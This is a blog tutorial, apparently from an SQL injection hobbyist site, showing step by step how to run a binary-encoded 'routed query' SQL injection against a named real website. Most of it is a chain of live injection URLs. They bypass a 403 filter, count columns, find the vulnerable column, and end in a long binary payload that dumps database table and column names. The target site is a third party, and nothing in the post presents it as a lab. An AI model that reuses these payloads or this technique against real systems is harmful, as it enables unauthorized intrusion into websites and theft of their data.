[Tutorial]Binary Based Routed Query[Kashmiri_Wolf] – SQLi Basic

[Tutorial]Binary Based Routed Query[Kashmiri_Wolf]

Hi Brothers I Am Here With Some Interesting Stuff !

Whole Credit Goes TO Kashmir_Hunter
Today I Will Show You How To Inject Site When Most Of Functions Are Almost Blocked And Your Luck Is Good That Day !!
You Can Get Basic Concept Of Routed Query From here
http://securityidiots.com/Web-Pentest/SQL-Injection/routed_sql_injection.html ~~> Thanks To Master Zen

Site(Used For Tutorial):

http://www.caresoft.ind.in/info.php?show=185

The Injecting Process : (upto vuln column)

http://pastebin.com/dJMA9uhd

Ok This Wasnt A Big Deal But Now The Real Task Comes Here And That Is Dios
It Was Not Too Easy So Lets Search For Routed Query Because Usually When We Face 403 forbidden error And With BOF Its Not Easy Or You Can Say Impossible To Bypass Information_schema So Hexed Routed Query Is Best Option If You Are Lucky You Can Find It In Target Site But Problem here is hex allows only one character

See How :

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x27,2,3,4,5,6,7-- -

(Error Mean Routed Query Exists)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x3127,2,3,4,5,6,7-- -

(403 forbidden) and we cant bypass it here so lets think If We Can print our name with hex and it also works for routed query so we can also do it with binary/char/base64 i will show u binary based and base64 based routed queries here

now lets see how

First DO Same Like Hexed routed query

00110001 00100111 (remove spaces)
put this in one column(1st)adding 0b at start to execute binary

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111 ,2,3,4,5,6,7-- -

(got Error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100101101001011010010000000101101,2,3,4,5,6,7-- -

Query Balanced Now Lets Check For Order By

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011011110111001001100100011001010111001000100000011000100111100100100000001100010011000000101101001011010010000000101101,2,3,4,5,6,7-- - 

(mean order by 10 –> error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111001000000110111101110010011001000110010101110010001000000110001001111001001000000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

(order by 7~~> no error)

Lets Find Vuln Columns

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011101010110111001101001011011110110111000100000011100110110010101101100011001010110001101110100001000000011000100101100001100100010110000110011001011000011010000101100001101010010110000110110001011000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

Here We Got Vulnerable Column And That Is 3 Under Image

Now Lets Dios The Site

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111001000000111010101101110011010010110111101101110001000000111001101100101011011000110010101100011011101000010000000110001001011000011001000101100011000110110111101101110011000110110000101110100001010000011000001111000001100100011001000110010011001100011001101100101001100100011001000110011011001010011001001100110001100110110010100110011011000110011011000110110001101100110011000110110011001010011011100110100001100100011000000110110001100110011011001100110001101100110001100110110011001100011011100110010001100100011000000110011011001000011011100110010001101100011010100110110001101000011001101100101001101000110001000110110001110010011011001100011001101100110001100110110001101010011011100110010001011000110110101100001011010110110010101011111011100110110010101110100001010000011011000101100010000000011101000111101001100000111100000110000011000010010110000101000011100110110010101101100011001010110001101110100001010000011000100101001011001100111001001101111011011010010100001101001011011100110011001101111011100100110110101100001011101000110100101101111011011100101111101110011011000110110100001100101011011010110000100101110011000110110111101101100011101010110110101101110011100110010100101110111011010000110010101110010011001010100000000111010001111010110110101100001011010110110010101011111011100110110010101110100001010000011010100110001001100010010110001000000001011000011000001111000001100110110001100110110011000110011011000111001001100110110010100101100011101000110000101100010011011000110010101011111011011100110000101101101011001010010110001100011011011110110110001110101011011010110111001011111011011100110000101101101011001010010100100101001001011000100000000101001001011000011000001111000001100110110001100110010011001100011011000110110001101100110011000110110011001010011011100110100001100110110010100101001001011000011010000101100001101010010110000110110001011000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

This Is Our Final Query !!!

Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz

Sorry For Bad Explanation …….. If Any Problem You Can Pm Me Here   Kashmiri_Wolf [FB]

Binary Based Routed Query Will Be Posted In Next Part … Stay Tuned For That …
Thanks To Sqli-Basic For Letting Me Share THis




Leave a Reply

Your email address will not be published. Required fields are marked *

Name *
Email *
Website